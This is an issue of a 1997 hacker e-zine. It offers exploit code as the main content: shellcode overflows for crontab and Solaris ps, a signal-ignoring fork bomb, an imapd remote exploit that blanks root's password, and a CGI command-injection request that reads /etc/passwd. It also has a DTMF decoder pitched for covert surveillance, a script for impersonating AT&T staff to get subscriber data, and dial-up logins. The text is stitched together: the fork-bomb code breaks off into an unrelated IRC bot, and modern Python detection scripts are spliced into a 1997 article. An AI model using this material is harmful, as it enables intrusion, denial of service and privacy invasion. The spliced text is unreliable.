.oO The CodeZero Oo.   .oO Presents Oo.

          -C-O-N-F-i-D-E-N-C-E-  -R-E-M-A-i-N-S-
               Issue 003, July 15th 1997.

Are you on a w1nd0ze / D0s system? We suggest you view this in EDIT.COM
for added AsKii effects!@#

         _
        /|    k0dek4t sez...
      \'o O'
      =(_o_)=   "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@"

----------------------------------
--     HTTP://WWW.CODEZ.COM     --
----------------------------------

In This "Added Vitamins And Minerals" Issue :

-----=> Section A : Introduction And Cover Story.

1. Confidence Remains High Issue 3....................: Tetsu Khan
2. The Future.........................................: so1o

-----=> Section B : Exploits And Code.

1. crontab b00gz......................................: unknown
2. DoS : superforker.c................................: Vio
3. Cool Bot Juarez : personal.tcl.....................: Scorn
4. imapd Remote Exploit...............................: aky / p1
5. Solaris 2.5.1 ps Exploit...........................: J. Zbiciak
6. handler CGI Hole...................................: so1o

-----=> Section C : Phones / Scanning / Radio.

1. DTMF Decoder.......................................: xFli
2. Dealing With Directory Assistance Operators........: Qytpo
3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik

-----=> Section D : Miscellaneous.

1. More sIn inf0z.....................................: The CodeZero + Friends
2. The Codez That NASA Use............................: so1o
3. Rooting From Bin...................................: so1o
4. DNS Spoofing.......................................: so1o
5. FreeNet............................................: TrN
6. Backdoors Revised..................................: Blk-Majik
7. One Last Thing About The Infamous pHf Technique....: so1o

-----=> Section E : World News.

1. Some History.......................................: nobody
2. [GUNNAR] and MadSeason and sIn.....................: so1o
3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o

-----=> Section F : Projects.

1. The CodeZero Remote Attack Kit Version 1.00 *FiNAL*: so1o

-----=> Section G : The End. (+ Personal Column)

===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================

1. Confidence Remains High Issue 3 : Tetsu Khan

Because we just cannot keep the payments for www.codez.com up, and the server keeps going up and down and up and down, Confidence Remains High and CodeZero tools will soon be available at the following sites :

http://www.insecurity.org/codez/              [ main site, write it down :) ]
http://www.7thsphere.com/hpvac/hacking.html   [ CRH distro site ]
http://www.r0ot.org                           [ CRH distro site ]

Also available thru FTP...

ftp.sekurity.org  /users/so1o/                [ Codez distro site ]

But we are hoping to set up a new SUPER DOMAIN!@# Expect that within the next issue or two, it will have...

CooL o-DaY WaReZ
eLeeT VMS hAx0RiN TeXt FiLeZ
K-r4d ANSi!@#

2. The Future : so1o

The Squirel is your friend, love the Squirel, trust the Squirel...

so1o

===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================

1.
crontab b00gz : unknown

/* crontab bug */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

long get_esp(void)
{
    __asm__("movl %esp, %eax\n");
}

int main(int argc, char **argv)
{
    int i, j, offset = 0;           /* offset defaults to 0 when none is given */
    char *bar, *foo;
    unsigned long *esp_plus = NULL;
    char mach_codes[] =
        "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
        "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
        "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
        "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

    if (argc == 2)
        offset = atoi(argv[1]);

    /* 1024 addresses plus the code that follows them; the original
       allocated only 4096 bytes and wrote past the end */
    bar = malloc(4096 + sizeof(mach_codes));
    if (!bar) {
        fprintf(stderr, "failed to malloc memory\n");
        exit(1);
    }
    foo = bar;                      /* copy of original ptr */

    /* fill the argument with the guessed stack address ... */
    esp_plus = (unsigned long *)bar;
    for (i = 0; i < 1024; i++)
        *(esp_plus++) = (get_esp() + offset);
    printf("Using offset (0x%x)\n", (get_esp() + offset));

    /* ... and append the machine code after it */
    bar = (char *)esp_plus;
    for (j = 0; j < strlen(mach_codes); j++)
        *(bar++) = mach_codes[j];
    *bar = 0;

    execl("/usr/bin/crontab", "crontab", foo, NULL);
}

2. DoS : superforker.c : Vio

This program is fucking evil. I have tested it on a few systems and it just screws them over and sloooOOooows them right down; you can't throw anything at the shell, it's pretty sadistic...

/* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the bugtraq
   This program is a beefed up classic denial of service fork()'er :)

   Compilation:
     on BSD type of systems do:   gcc -DBSD_C -o cvn cvn.c
     on SysV type of systems do:  gcc -DSYSV_C -o cvn cvn.c
     on my linux, I can compile it with both -DBSD_C and -DSYSV_C
     if you're not sure, you can experiment, or compile it without any -D'efines

   In the future:
     SunOS signals ignored.
     Creation of random symlinks for more gory destruction.
     Using advanced technology coding to make the hard drive blow up with a
     loud boom and the console explode causing a nuclear meltdown.

   Direct All Suggestions And Flames to: Vio

   NOTE: this program is provided for educational purposes only, its author
   will not take any responsibility for any stupid things you will decide to do.
   this has been tested, but not the latest version of it. */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>

#define MAX_FILELEN 100     /* The _actual_ max length */
#define MAX_DIRLEN  10
#define START_DIR   "/tmp"  /* This can be substituted for any directory */
                            /* that you have write access to */

void dirs_generator(void);

int main(int argc, char *argv[])
{
    int fp;
    char *buff;
    char chr;

    unlink(argv[0]);

    /* You might wanna ignore all the signals you can ignore.. */
    signal(SIGINT, SIG_IGN);    /* If any of the signals don't work */
    signal(SIGHUP, SIG_IGN);    /* on the system you are compiling */
    signal(SIGTERM, SIG_IGN);   /* them on, just erase that line */
    signal(SIGALRM, SIG_IGN);
    signal(SIGBUS, SIG_IGN);
    signal(SIGFPE, SIG_IGN);
    signal(SIGILL, SIG_IGN);
    signal(SIGIOT, SIG_IGN);
    signal(SIGPIPE, SIG_IGN);
    signal(SIGQUIT, SIG_IGN);
    signal(SIGSEGV, SIG_IGN);
    signal(SIGTRAP, SIG_IGN);
    signal(SIGUSR1, SIG_IGN);
    signal(SIGUSR2, SIG_IGN);
#ifdef BSD_C
    signal(SIGPROF, SIG_IGN);
    signal(SIGSTOP, SIG_IGN);
    signal(SIGTSTP, SIG_IGN);
    signal(SIGTTIN, SIG_IGN);
    signal(SIGTTOU, SIG_IGN);
    signal(SIGVTALRM, SIG_IGN);
    signal(SIGXCPU, SIG_IGN);
    signal(SIGXFSZ, SIG_IGN);
#endif
#ifdef SYSV_C
    signal(SIGPOLL, SIG_IGN);
    signal(SIGPWR, SIG_IGN);
#endif

    /* the parent prints the banner and leaves; the child carries on */
    if (fork()) {
        printf("Now crashing and blowing up this system.. have a nice day\n");
        printf("You can safely logout, and let the proggie do its work\n");
        printf("or you can stick around and watch lag go from 0 to bitch\n");
        printf("in a matter of seconds\n");
        printf("                                   --CoViN \n");
        exit(0);
    }

    /* the mode argument was missing in the original O_CREAT call */
    fp = open("/tmp/.foo", O_WRONLY | O_CREAT, 0600);
    if (fork()) {
        /* this branch forks without end, leaks memory and fills the file */
        while (1) {
            fork();
            buff = malloc(64000);
            write(fp, buff, 64000);
            system("uptime");
        }
    }
    dirs_generator();
}

void dirs_generator(void)
{
    char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
    char fl[MAX_FILELEN];
    char dir[MAX_DIRLEN];
    int i;
    int flen;

    printf("Making dirs..\n");
    chdir(START_DIR);
    fork();     /* For the simplicity of the code..
                   we also want more dir's from */
    fork();     /* the START_DIR */
    fork();
    while (1) {
        fork();
        flen = (rand() % MAX_FILELEN) - 1;
        for (i = 0; i

> Persona-Answer"
        return 1
    }
    return 0
}

# function to answer greetings
proc pub_greet {nick uhost hand channel args} {
    global greets greet_size persona_flag
    if {$persona_flag} {
        persona_pause
        putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick"
        putlog "<<$nick>> Persona-Greet"
        return 1
    }
    return 0
}

# function to answer stupid stuff
proc pub_stupid {nick uhost hand channel args} {
    global stupid stupid_size persona_flag
    if {$persona_flag} {
        persona_pause
        putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])"
        putlog "<<$nick>> Persona-Stupid"
        return 1
    }
    return 0
}

# function to answer goodbyes
proc pub_bye {nick uhost hand channel args} {
    global bye bye_size persona_flag
    if {$persona_flag} {
        persona_pause
        putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick"
        putlog "<<$nick>> Persona-Bye"
        return 1
    }
    return 0
}

# misc. functions
proc pub_tk3 {nick uhost hand channel args} {
    global persona_flag
    if {$persona_flag} {
        persona_pause
        putserv "PRIVMSG $channel :$nick, check out tk3play at bleh"
        putlog "<<$nick>> Persona-tk3play"
        return 1
    }
    return 0
}

# function to enforce minimum pause between responses
proc persona_pause {} {
    global persona_flag persona_wait
    if {$persona_flag} {
        persona_off
        utimer $persona_wait persona_on
    }
    return 1
}

# functions to turn the personality on and off
proc persona_on {} {
    global persona_flag
    set persona_flag 1
    return 1
}

proc persona_off {} {
    global persona_flag
    set persona_flag 0
    return 1
}

putlog "Scorn's persona.tcl is loaded"

4. imapd Remote Exploit : aky / p1

This is the slightly upgraded version of this exploit floating around. There is also another, which is very hard to get, which spawns a shell with root access; I have also heard of European hacker groups coding homemade versions and variants which will do this. So for the moment, here's this exploit. imapd usually runs on port 143.
This version changes the root passwd field to being blank, so you can su to root without a password. I have heard there are problems and limitations with this, but that ain't my problem..

/*
 * This is the remote exploit of the hole in the imap daemon, for Linux.
 * The instruction code is doing open(), write(), and close() system calls,
 * and it adds a line root::0:0.. at the beginning of /etc/passwd (change to
 * /etc/shadow if needed). The code needs to be self modifying since imapd
 * turns everything to lowercase before it pushes it on the stack.
 * The problem is that it rewrites the first line of passwd/shadow, therefore
 * losing the root password. I'm sorry, but I don't have time to add in the
 * seek syscall.
 *                              - Akylonius (aky@galeb.etf.bg.ac.yu) [1997]
 *
 * Modifications made on 5.1.97 to accept command line hostname, with
 * 'h_to_ip' function that resolves it to an ip.
 *                              - p1 (p1@el8.org)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname)
{
    struct hostent *h;
    struct sockaddr_in tmp;
    struct in_addr in;

    h = gethostbyname(hostname);
    if (h == NULL) {
        perror("Resolving the host. \n");
        exit(-1);
    }
    memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
    memcpy(&in, &tmp.sin_addr.s_addr, 4);
    return (inet_ntoa(in));
}

void banner(void)
{
    system("clear");
    printf("\nIMAP Exploit for Linux.\n");
    printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
    printf("  Modifications: p1 (p1@el8.org)\n");
}

int main(int argc, char **argv)
{
    int fd;
    struct sockaddr_in sckdaddr;
    char *hostname;
    char buf[4092];
    int i = 8;
    char realegg[] =
        "\xeb\x58\x5e"
        "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
        "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
        "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
        "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
        "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
        "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
        "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
        "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
        "\xe8\x83\xff\xff\xff"
        "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
    char *point = realegg;

    /* the IMAP command prefix "* login " */
    buf[0] = '*';
    buf[1] = ' ';
    buf[2] = 'l';
    buf[3] = 'o';
    buf[4] = 'g';
    buf[5] = 'i';
    buf[6] = 'n';
    buf[7] = ' ';

    banner();

    if (argc < 2) {
        printf("\nUsage: %s \n\n", argv[0]);
        exit(-1);
    }
    hostname = argv[1];

    /* nop sled, then the egg, then the saved ebp and return address */
    while (i < 1034 - sizeof(realegg) - 1)      /* -sizeof(realegg)+1) */
        buf[i++] = 0x90;
    while (*point)
        buf[i++] = *(point++);
    buf[i++] = 0x83;    /* ebp */
    buf[i++] = 0xf3;
    buf[i++] = 0xff;
    buf[i++] = 0xbf;
    buf[i++] = 0x88;    /* ret adr */
    buf[i++] = 0xf8;
    buf[i++] = 0xff;
    buf[i++] = 0xbf;
    buf[i++] = ' ';
    buf[i++] = 'b';
    buf[i++] = 'a';
    buf[i++] = 'h';
    buf[i++] = '\n';
    buf[i++] = 0x0;

    if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        perror("Error opening the socket. \n");

    sckdaddr.sin_port = htons(143);
    sckdaddr.sin_family = AF_INET;
    sckdaddr.sin_addr.s_addr = inet_addr(h_to_ip(hostname));

    if (connect(fd, (struct sockaddr *)&sckdaddr, sizeof(sckdaddr)) < 0)
        perror("Error with connecting. \n");

    printf("hmm: \n");
    getchar();
    write(fd, buf, strlen(buf) + 1);
    printf("hmm: \n");
    close(fd);
}

5. Solaris 2.5.1 ps Exploit : J. Zbiciak

#!/bin/sh
#
# Exploit for Solaris 2.5.1 /usr/bin/ps
# J. Zbiciak, 5/18/97
#
# Just copy this into one file, upload it to a system, chmod 755 and
# then run it using
#
# change as appropriate
CC=gcc

# Build the "replacement message" :-)
cat > ps_expl.po << E_O_F
domain "SUNW_OST_OSCMD"
msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n"
msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\017\202\020\040\001\221\320\040\010"
E_O_F
msgfmt -o /tmp/foo ps_expl.po

# Build the C portion of the exploit
cat > ps_expl.c << E_O_F
/*****************************************/
/* Exploit for Solaris 2.5.1 /usr/bin/ps */
/* J. Zbiciak, 5/18/97                   */
/*****************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_LENGTH (632)
#define EXTRA (256)

int main(int argc, char *argv[])
{
    char buf[BUF_LENGTH + EXTRA];
    /* ps will grok this file for the exploit code */
    char *envp[] = {"NLSPATH=/tmp/foo", 0};
    u_long *long_p;
    u_char *char_p;
    /* This will vary depending on your libc */
    u_long proc_link = 0xef70ef70;
    int i;

    long_p = (u_long *) buf;

    /* This first loop smashes the target buffer for optargs */
    for (i = 0; i < (96) / sizeof(u_long); i++)
        *long_p++ = 0x10101010;

    /* At offset 96 is the environ ptr -- be careful not to mess it up */
    *long_p++ = 0xeffffcb0;
    *long_p++ = 0xffffffff;

    /* After that is the _ctype table. Filling with 0x10101010 marks the
       entire character set as being "uppercase printable". */
    for (i = 0; i < (BUF_LENGTH - 104) / sizeof(u_long); i++)
        *long_p++ = 0x10101010;

    /* build up _iob[0] (Ref: /usr/include/stdio.h, struct FILE) */
    *long_p++ = 0xFFFFFFFF;     /* num chars in buffer */
    *long_p++ = proc_link;      /* pointer to chars in buffer */
    *long_p++ = proc_link;      /* pointer to buffer */
    *long_p++ = 0x0501FFFF;     /* unbuffered output on stream 1 */
    /* Note: "stdin" is marked as an output stream. Don't sweat it.
       :-) */

    /* build up _iob[1] */
    *long_p++ = 0xFFFFFFFF;     /* num chars in buffer */
    *long_p++ = proc_link;      /* pointer to chars in buffer */
    *long_p++ = proc_link;      /* pointer to buffer */
    *long_p++ = 0x4201FFFF;     /* line-buffered output on stream 1 */

    /* build up _iob[2] */
    *long_p++ = 0xFFFFFFFF;     /* num chars in buffer */
    *long_p++ = proc_link;      /* pointer to chars in buffer */
    *long_p++ = proc_link;      /* pointer to buffer */
    *long_p++ = 0x4202FFFF;     /* line-buffered output on stream 2 */
    *long_p = 0;

    /* The following includes the invalid argument '-z' to force the usage
       msg to appear after the arguments have been parsed. */
    execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp);
    perror("execle failed");
    return 0;
}
E_O_F

# Compile it
$CC -o ps_expl ps_expl.c

# And off we go!
exec ./ps_expl

6. handler CGI Hole : so1o

New bug that affects most IRIX systems, here's how you use it...

telnet target.machine.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0

===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================

1. DTMF Decoder : xFli

DTMF Decoder plans.
-------------------

If you are into bigtime surveillance, or you just have some burning desire to get the phone number of your sister's sexy friend, then you will be interested in this little circuit. Basically, using this, you can use a tape recorder and a pickup coil to record the DTMF tones sent when someone dials a number (or, if it is easier, wire it up to a phone jack and decode in realtime), and then decode them to get the number dialled. This can cope with speed dialling, but you will need a reasonably good recording to decode successfully. The circuit is simplicity itself, literally only 5 components.
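Looking back at the imapd exploit in Section B.4: its payload overwrites the first line of /etc/passwd with a root entry whose password field is empty. The script below is an added example, not code from the zine or its authors, that audits a passwd-format file for exactly that residue: an empty password field, a uid-0 account that is not root, and lines that no longer have the seven fields a passwd entry must have. The sample file contents are constructed for illustration; the first line is the entry the payload writes.

```python
from dataclasses import dataclass

# Constructed sample (not a real system's file): the first line is the entry
# the exploit's payload writes; the others are ordinary shadowed accounts.
SAMPLE_PASSWD = """\
root::0:0:r00t:/:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
toor:x:0:0:second uid-0 login:/:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str) -> list[Finding]:
    """Return one Finding per suspicious entry in passwd-format text.

    Flags an empty password field (login or su without a password), any
    uid-0 account that is not 'root', and lines without the seven
    colon-separated fields a passwd entry must have (a clobbered first
    line usually shows up as one of these).
    """
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append(Finding(line_no, raw, "malformed entry (expected 7 fields)"))
            continue
        user, password, uid, _gid, _gecos, _home, _shell = fields
        if password == "":
            findings.append(Finding(line_no, user, "empty password field"))
        if uid == "0" and user != "root":
            findings.append(Finding(line_no, user, "uid 0 account that is not root"))
    return findings


def audit_report(text: str = SAMPLE_PASSWD) -> list[str]:
    """One human-readable line per finding."""
    return [f"line {f.line_no}: {f.user}: {f.reason}" for f in audit_passwd(text)]


if __name__ == "__main__":
    for entry in audit_report():
        print(entry)
```

Run it over a copy of /etc/passwd; the same function works on /etc/shadow, since the payload's comment notes the target file can be swapped. On a clean system it returns an empty list, which makes it cheap to run from cron and alert on any output.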
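The handler CGI hole in Section B.6 works by placing shell metacharacters in the path under /cgi-bin/handler. As an added example (not from the zine), the following scans Common Log Format access-log lines for that shape, percent-decoding the path first so that an encoded `%3B` or `%7C` is treated the same as a literal `;` or `|`. The log lines are constructed; the second mirrors the request shown in that section.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines (not from any real server). The second
# mirrors the request shown in Section B.6; the third is the same thing
# percent-encoded; the rest are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jul/1997:12:00:01 +0000] "GET /cgi-bin/handler/readme.txt?data=Download HTTP/1.0" 200 512
10.0.0.9 - - [15/Jul/1997:12:00:02 +0000] "GET /cgi-bin/handler/x;cat%20/etc/passwd|?data=Download HTTP/1.0" 200 1834
10.0.0.9 - - [15/Jul/1997:12:00:03 +0000] "GET /cgi-bin/handler/x%3Bid%7C?data=Download HTTP/1.0" 200 90
10.0.0.7 - - [15/Jul/1997:12:00:04 +0000] "GET /index.html HTTP/1.0" 200 2048
10.0.0.7 - - [15/Jul/1997:12:00:05 +0000] "GET /search.cgi?q=a&b=c HTTP/1.0" 200 300
"""

# client ident user [timestamp] "method target [version]" status size
CLF = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)

# characters that reach a shell when they appear in the handler path
SHELL_META = set(";|&`$")


def decode_path(target: str) -> str:
    """Path part of the request-target, percent-decoded so %3B/%7C read as ;/|."""
    return unquote(target.split("?", 1)[0])


def is_handler_injection(target: str) -> bool:
    path = decode_path(target)
    return path.startswith("/cgi-bin/handler") and any(c in SHELL_META for c in path)


def find_handler_injections(log_text: str) -> list[tuple[str, str]]:
    """(client, decoded path) for every request matching the handler pattern."""
    hits: list[tuple[str, str]] = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if m and is_handler_injection(m["target"]):
            hits.append((m["client"], decode_path(m["target"])))
    return hits


if __name__ == "__main__":
    for client, path in find_handler_injections(SAMPLE_LOG):
        print(f"{client} -> {path}")
```

Only the path component is checked, because `&` is ordinary in a query string; for this hole the metacharacters sit before the `?`, as the request in Section B.6 shows.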
I could have included an unreadable ascii circuit diag / pcb layout, but it would have been a waste of time, so the diags are available from http://www.codez.com and other CodeZero sites. The hardware takes the DTMF signal, decodes it and sends it to lpt1, where the binary output of the IC is converted into standard numbers. The simple BASIC program is included, and is precompiled on http://www.codez.com.

Component list:
---------------
1 x SSI202 18 pin Chip
1 x 3.579 MHz quartz crystal
2 x 27n Capacitors
1 x 1M resistor

Source:
-------

DTMF DECODER SOFTWARE
------------------------------------------
' Use this to decode the output from the decoder hardware
' Not written by xFli, suggested in an electronics mag.
' Lines 30, 180 and 220 jump back to the INP line so the port is re-read;
' as printed they jumped to themselves and spun on a stale value.
10 CLS:KEY OFF
20 I=INP(&H279)
30 IF (I AND 128)=128 THEN 20
40 C=0
50 IF (I AND 8)=8 THEN C=C+1
60 IF (I AND 16)=16 THEN C=C+2
70 IF (I AND 32)=32 THEN C=C+4
80 IF (I AND 64)=64 THEN C=C+8
90 IF C=11 THEN PRINT" * ";:GOTO 180
100 IF C=12 THEN PRINT" # ";:GOTO 180
110 IF C=13 THEN PRINT" A ";:GOTO 180
120 IF C=14 THEN PRINT" B ";:GOTO 180
130 IF C=15 THEN PRINT" C ";:GOTO 180
140 IF C=0 THEN PRINT" D ";:GOTO 180
150 IF C=10 THEN PRINT" 0 ";:GOTO 180
160 PRINT C;
170 I=INP(&H279)
180 IF (I AND 128)=0 THEN 170
190 T=TIMER
200 I=INP(&H279)
210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 30
220 IF (I AND 128)=128 THEN 200
230 GOTO 50

In the magazine, it is advised you use GW-BASIC, which is included with very very early DOS versions. It may or may not work with QBasic etc., I don't know. These are also for UK tones; maybe they are different in the US.

2. Dealing with directory assistance operators : Qytpo

Alright, this information should be made available to everyone who cares to read it. Any information used from this article is to be used at a person's own risk. I will not be held responsible if any of this is used for wrongful purposes (it can be, you just have to get really creative).
Well, to start off, the job of the directory assistance operator, is to give out addresses, phone numbers, and area codes, for the information given to them. The operators can search from names, business names, and government names, despite what anyone tells you, an AT&T DIRECTORY ASSISTANCE OPERATOR CAN DO A CNA SEARCH. (Customer name and address) If the particular operator says they cant, then bug them. yell at them. if they dont do it themselves, they will get their supervisor. and if you make it sound really important they can do it. and if all that doesnt work, try to find a naive operator, tell them you are an AT&T administrator, and say, to press (Control+C) to bring up a CNA search on their switch. A CNA search is a very valuable asset, if you cannot find a CNA operator, give a directory assistance operator a whirl, chances are, if you have a brain, and are a decent actor, you can get the listing for the number you give them. Routing. The calls are routed through a large mainframe in each state department How it works: Say you dial, 602-555-1212. that would put you through to an operator ANYWHERE in the United States, where phoenix calls are routed through to. it will not just appear in 602, allthought that is where it is supposed to. If the switches in 602 are full, the call could end up anywhere in the US. When the operator picks up the reciever- (it is actually a headset that beeps). The call is automatically traced to whatever area code they dialed. so if You dialed (602 555 1212). an operator anywhere in the US, would get a listing on their screen, and a default city, in the upper left hand corner [PHOE] (phoenix arizona). [ *note*: depending on the area code, 602 for example, the operator can search the area codes permitted in that area code..] 
for example, if you dialed 602-555-1212, the operator would be allowed to search in 502 (the other area code in AZ) However, in some area codes, they will make you redial, like LA, or TEXAS, or NEWYORK; they have so many area codes, For example 310 and 210, in LOS ANGELES If you wanted a listing for LOS ANGELES, and dialed 210-555-1212, and wanted a listing for city in los angeles which was 310, they would make you hang up and dial 310-555-1212. (the operator shuld be saying to himself/herself, "no, this kiddie needz to call 310 instead, or i get fired for giving out bad information"...if they have a clue) Sample Call to a D A O for a CNA Search: ( The best way to get info ) ( caller dials 555-1212 in area code ) City please? Yes, this is James Thornton at AT&T the AT&T administrative assistance office. I need you to do a CNA Search for me. I'm sorry sir, we're not permitted to do CNA searches. Yes, I know. May I speak to a supervisor? This is So and So supervisor, how can I help you sir? Yes, this is James Thornton down at the AT&T (also called Excel) office in Florida, we need a CNA search done for a XXX-XXX-XXXX. One moment please. Ok. Ok, I am (or am not) showing a listing for XXX-XXX-XXXX, would you like that listing sir? Yes please, and I would like that verbally. (if you time it just right, you can get the info for free. if yer beige boxing, it doesnt really make a difference tho.) - hang up, say "what" a few times, to make it sound like you didnt get the listing. and hang up before she finishes the second time. she can only bill you while you are on the line, and if she fucks up, you can get away with it with no bill while they read you the number. This method only works for a verbal listing. if yer quick enough. ;) - - - The NPA RULES. 
- - - NPA dialed : NPAS PERMITTED TO SEARCH IN FROM THE NPA DIALLED -----California---- 213 213 209 408 510 707 916 408 209 510 415 510 707 510 209 408 415 707 916 707 209 415 510 916 714 714 916 209 510 707 -------Texas------- 210 512 915 214 817 903 972 281 409 713 409 281 512 713 817 903 512 210 409 817 915 713 281 409 806 817 915 817 214 409 512 806 903 903 214 409 817 915 210 512 806 817 972 214 817 903 -----New York------ 212 718 914 917 315 518 607 716 516 718 518 315 607 914 607 315 518 716 914 716 315 607 718 212 518 914 914 212 518 607 718 917 (cell) 212 718 914 *note*: all other states can search all NPA's listed in that state. - Qytpo (@#hackers on EFnet) 3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik Some Interesting ph0ne #'s [07.06.97] Have some real phun with these, they are up-to-date!@# [RUSSiA] +7 095 XXXxxxx ----------------------------------------------------------------------- AT&T Calling Cards Service ----------------------------------------------------------------------- 9740074 Tone System - AT&T Moscow HQ switch to tone mode press 0 to page operator then by pressing "1" ya can record your voice message then by pressing "2" & "3" ya can hear your record :) 7555042 English-speeking AT&T operator 1555042 Also Automate AT&T Calling System is here ( tone mode ) 7555555 Russian-speeking AT&T operator 1555555 No AT&T Tone Machine ! ----------------------------------------------------------------------- Sprintnet Local Dial-Ups 02501 & 03110 DNICs GlobalOne = Sprintnet = Telenet ----------------------------------------------------------------------- 9286344 9600 9280985 9600 9137166 9600 < Only for MAIL 5789119 2400 3428376 9600 real connect 2400 9167373 SprintNet V34-19200 9167272 ??? 9167171 ? 00wait8 RoSprint PPP dialup. 
----------------------------------------------------------------------- ROSPAC Local Dial-Ups 02500 DNIC ----------------------------------------------------------------------- 9270003 9600 9563692 9600 9563690 ----------------------------------------------------------------------- Rosnet Dialups 02506 DNIC ----------------------------------------------------------------------- 975-8403 913-3571 921-2103 201-2030 Voice:(095)206-8570,206-8458,206-7238 442-6422 442-8277 442-7022 442-8388 442-7088 442-8577 442-8077 442-6477 Iskra-2: 20-906,33-571 ----------------------------------------------------------------------- IBM net Dial-Up ----------------------------------------------------------------------- 2586420 ----------------------------------------------------------------------- Russia@Online Dial-Ups 28.8Kbps ----------------------------------------------------------------------- 9132376 30 lines 2584120 60 lines 3619999 2584161 Voice phone ! ----------------------------------------------------------------------- InfoNet Euro ----------------------------------------------------------------------- 9150001 28.8 9150005 28.8 2400 temp [unpublished] 2400 temp [unpublished] 2400 temp [unpublished] 2400 temp [unpublished] 2927056 Infonet Euro Voice ! ----------------------------------------------------------------------- Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT} ) ----------------------------------------------------------------------- 9563589 14400 [unpublished] 9676767 24400 9676730 9676731 9676732 9676733 9676734 9676735 9676755 9676759 9676763 9676766 9676784 9562455 SITA voice! phones 9564736 00wait5 pᨭ 業p STB Card. 00wait9 free information service 974 5122 Elvis+,Co Proxy 194.190.195.71. 961 5122 DNS 195.190.195.66. 
SLIP login: iptest temp 192.168.12.1 PPP login: pptest Password: guest ----------------------------------------------------------------------- CentroNet DialUp www.astro.ru ----------------------------------------------------------------------- 7511704 14400 ----------------------------------------------------------------------- Infotel dialUps [02504] ----------------------------------------------------------------------- 9585475 9580226 9580825 9580575 ----------------------------------------------------------------------- MMTEL DialUPs [02503] ----------------------------------------------------------------------- 3371001 5 lines 2419860 .db 2418340 2461661 ----------------------------------------------------------------------- PTT-Teleport www.ptt.ru ----------------------------------------------------------------------- 946-9383 voice about x.25,28,etc 946-9393 modem PPP ----------------------------------------------------------------------- www.dataforce.net ----------------------------------------------------------------------- 9566749 voice 2889340 ----------------------------------------------------------------------- FaxInfo Demo Tone Voice Line ----------------------------------------------------------------------- 9629424 demo user code : 12345 9759220 Telephone Voice Bulletin Board ----------------------------------------------------------------------- Voice Mail boxes ----------------------------------------------------------------------- 7059285 leave me mail in 80718 box 9253503 Online registration 4 email 9253507 ----------------------------------------------------------------------- Strange #s : ----------------------------------------------------------------------- 2587474 Logon: 2586435 2586411 2586414 30 32 9269199 9500885 9563686 ----------------------------------------------------------------------- Demos 33.8 V34 HST ----------------------------------------------------------------------- 958-19-75 958-19-81 956-62-85 956-62-86 241-05-05 
